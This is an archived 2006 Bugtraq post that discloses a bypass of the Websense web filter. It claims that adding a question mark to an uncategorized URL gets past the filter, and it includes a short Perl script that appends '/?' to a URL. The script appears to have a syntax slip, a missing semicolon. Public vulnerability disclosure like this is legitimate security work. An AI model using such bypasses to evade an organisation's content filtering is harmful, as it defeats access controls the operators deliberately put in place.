lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 20 Apr 2006 12:03:38 -0000
From: qex@...mail.org
To: bugtraq@...urityfocus.com
Subject: Websense Filter Bypass


#!/usr/bin/perl -w
#
# Websense Filter Bypass
#
# ====================
# Discovered by: Qex
# Date: 19 April 2006
# ====================
#
# Bypass any website that is in the "Uncategorized" Websense Category
# simply by adding a question mark (?) at the end of the URL.

print q(
Websense Filter Bypass

====================
Discovered by: Qex
Date: 19 April 2006
====================
)

print "Enter URL:\n";

$url = <STDIN>;

chomp $url;

$bypass = "$url/?";


print "\nURL: \n$bypass\n";


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ